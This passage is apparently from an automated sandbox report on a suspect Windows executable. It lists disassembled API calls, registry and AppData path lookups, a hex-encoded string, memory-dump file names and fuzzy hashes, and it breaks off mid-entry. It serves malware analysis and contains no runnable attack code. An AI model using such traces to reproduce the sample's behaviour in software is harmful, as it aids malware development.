                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,00000000), ref: 00641887
                            • Part of subcall function 00641820: lstrcat.KERNEL32(00000000,00000000), ref: 00641892
                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,00000000), ref: 006418C1
                            • Part of subcall function 00641820: lstrlen.KERNEL32(00654FA0), ref: 006418D3
                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,00000000), ref: 006418F4
                            • Part of subcall function 00641820: lstrcat.KERNEL32(00000000,00654FA0), ref: 00641900
                            • Part of subcall function 00641820: lstrcpy.KERNEL32(00000000,00000000), ref: 0064192F
                          • sscanf.NTDLL ref: 00641B9A
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00641BB6
                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00641BC6
                          • ExitProcess.KERNEL32 ref: 00641BE3
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Timelstrcpy$System$Filelstrcatlstrlen$ExitProcesssscanf
                          • String ID:
                          • API String ID: 3040284667-0
                          • Opcode ID: 97234738c51d43c3b0cf42f659a421f7d9905ed62e7bd638daf222d059acc65d
                          • Instruction ID: a925f1eaa08e3458727b03dd661adf513e96893a9dd747fe89af06da522c713e
                          • Opcode Fuzzy Hash: 97234738c51d43c3b0cf42f659a421f7d9905ed62e7bd638daf222d059acc65d
                          • Instruction Fuzzy Hash: D121F0B5408301EF8340DF69D88489BBBF9FFC8215F409E1EF599C3260E73496088BA6
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00643166
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0064316D
                          • RegOpenKeyExA.ADVAPI32(80000002,0128BAB8,00000000,00020119,?), ref: 0064318C
                          • RegQueryValueExA.ADVAPI32(?,0129D408,00000000,00000000,00000000,000000FF), ref: 006431A7
                          • RegCloseKey.ADVAPI32(?), ref: 006431B1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateCloseOpenProcessQueryValue
                          • String ID:
                          • API String ID: 3225020163-0
                          • Opcode ID: 8ba4c49b6c37438c2ae7c9c1ea1cd882bd5a1788db181e89d62922d5a7c76129
                          • Instruction ID: 421c6a71f12936b1e886880a44e833407a37626a1a41f88489ccf7423a283c99
                          • Opcode Fuzzy Hash: 8ba4c49b6c37438c2ae7c9c1ea1cd882bd5a1788db181e89d62922d5a7c76129
                          • Instruction Fuzzy Hash: D5113076A40315EFD710CF94DD45BABBBBCF748712F00456AFA05E3680DB7959048BA1
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: String___crt$Type
                          • String ID:
                          • API String ID: 2109742289-3916222277
                          • Opcode ID: 6160142c4e5a1eacef826585e8f49c17d9dba2cdb18519c4bfe97b3e8db3c65f
                          • Instruction ID: ce29bf504a211851f9629d63f6602264e6023c0fab165b75d2842af91ef6bc37
                          • Opcode Fuzzy Hash: 6160142c4e5a1eacef826585e8f49c17d9dba2cdb18519c4bfe97b3e8db3c65f
                          • Instruction Fuzzy Hash: 4141F67054475CAEDB318B248C89FFB7BFE9B45304F1444E8E98687182E2719B458F34
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00628996
                            • Part of subcall function 0064A1C0: std::exception::exception.LIBCMT ref: 0064A1D5
                            • Part of subcall function 0064A1C0: std::exception::exception.LIBCMT ref: 0064A1FB
                          • std::_Xinvalid_argument.LIBCPMT ref: 006289CD
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: invalid string position$string too long
                          • API String ID: 2002836212-4289949731
                          • Opcode ID: 5afa85b7126ac066fa813f6bce196101143234857175634097253d12c500a0d0
                          • Instruction ID: 9c9e02a4bb302f16c2de769fd32baa732c9c5d51a6a2dcbef4c84496b4a8f739
                          • Opcode Fuzzy Hash: 5afa85b7126ac066fa813f6bce196101143234857175634097253d12c500a0d0
                          • Instruction Fuzzy Hash: A721F672701A208FC7209A5CFC40A6AF39BDBA17A1B15097FF141CB281CE71DC81CBA9
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00628883
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: 76cb3d162a0efa405a456d31bdfad97f2509a712482f445c4485d0ee5f348449
                          • Instruction ID: 52575c6ca7b699f3b798faf2ab8c4e34b0721a241cea8d73d17085490988e9c2
                          • Opcode Fuzzy Hash: 76cb3d162a0efa405a456d31bdfad97f2509a712482f445c4485d0ee5f348449
                          • Instruction Fuzzy Hash: C431C7B5E005199FCB08DF58D8906AEBBB6EB88350F148269E905EF384DB30AD01CBD1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645922
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          • std::_Xinvalid_argument.LIBCPMT ref: 00645935
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_std::exception::exception
                          • String ID: Sec-WebSocket-Version: 13$string too long
                          • API String ID: 1928653953-3304177573
                          • Opcode ID: 92c1d63525ea8e0056cb47b0b35a8b2a40e8255c3f6926f16a9a658efed542b4
                          • Instruction ID: 8aa813d3d84f67836f104b7273703e7b2b1c9788b3e395e7c85343816789a215
                          • Opcode Fuzzy Hash: 92c1d63525ea8e0056cb47b0b35a8b2a40e8255c3f6926f16a9a658efed542b4
                          • Instruction Fuzzy Hash: 49118231304B80CBC7319B2CE80075977E3ABD1761F250AADE0D287796CB61D841C7A5
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,?,0064A430,000000FF), ref: 00643D20
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00643D27
                          • wsprintfA.USER32 ref: 00643D37
                            • Part of subcall function 006471E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006471FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcesslstrcpywsprintf
                          • String ID: %dx%d
                          • API String ID: 1695172769-2206825331
                          • Opcode ID: c1d03ba105f0e1d345bfa36336cfd31e51c289bb175d9b6817bba30fa64d809b
                          • Instruction ID: 55eda4a9a24eb24824cd0fd4567d5b8cd7c934d283036ec024f47ae362e61938
                          • Opcode Fuzzy Hash: c1d03ba105f0e1d345bfa36336cfd31e51c289bb175d9b6817bba30fa64d809b
                          • Instruction Fuzzy Hash: 5701C071640B14FBE7105B54DC0AF6ABBA8FB45B62F100515FA05972D0DBB81900CBA1
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00628737
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A188
                            • Part of subcall function 0064A173: std::exception::exception.LIBCMT ref: 0064A1AE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: std::exception::exception$Xinvalid_argumentstd::_
                          • String ID: vector<T> too long$yxxx$yxxx
                          • API String ID: 2002836212-1517697755
                          • Opcode ID: dff946dd96a559b2155d280f957dcb4930f3083d079f1509c8a776fe21f868f6
                          • Instruction ID: 43fc73e5bf03b356fd8cede2a5bffa5482f0beaeca7b777adaa4619d16e687f0
                          • Opcode Fuzzy Hash: dff946dd96a559b2155d280f957dcb4930f3083d079f1509c8a776fe21f868f6
                          • Instruction Fuzzy Hash: F9F0BE37F014321F8354A43DAD8449EA94796E539033AD765E81AEF399EC70EC829AD4
                          APIs
                            • Part of subcall function 0064781C: __mtinitlocknum.LIBCMT ref: 00647832
                            • Part of subcall function 0064781C: __amsg_exit.LIBCMT ref: 0064783E
                          • ___addlocaleref.LIBCMT ref: 00648756
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ___addlocaleref__amsg_exit__mtinitlocknum
                          • String ID: KERNEL32.DLL$Xue$xte
                          • API String ID: 3105635775-3528272311
                          • Opcode ID: fb2672092ff57117544d4587f75bfde0061e2057a74e32b796b91786e193df9e
                          • Instruction ID: 1805a41b787d6d18d15e0c6b1b3a553890efb56b70978767309f363308cd041a
                          • Opcode Fuzzy Hash: fb2672092ff57117544d4587f75bfde0061e2057a74e32b796b91786e193df9e
                          • Instruction Fuzzy Hash: FF01C071445B00DED760AF79D80974EBBE2AF50321F20891EE4D6676E1CFB0AA44CB18
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063E544
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063E573
                          • lstrcat.KERNEL32(?,00000000), ref: 0063E581
                          • lstrcat.KERNEL32(?,0129D128), ref: 0063E59C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: d8e0d4864dfd55359cf7bc69c363ca2241e900c7cd21872c3afb5d7797ab027c
                          • Instruction ID: c35eec4d3dafe15f6b7070650ab3385727ef15bd53373671b10587d0d879d9cf
                          • Opcode Fuzzy Hash: d8e0d4864dfd55359cf7bc69c363ca2241e900c7cd21872c3afb5d7797ab027c
                          • Instruction Fuzzy Hash: 3B5192B1A10218AFC795EB54EC43EEE337EBF48311F04449DB90697281EE75AE448FA5
                          APIs
                          Strings
                          • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 00641FDF, 00641FF5, 006420B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
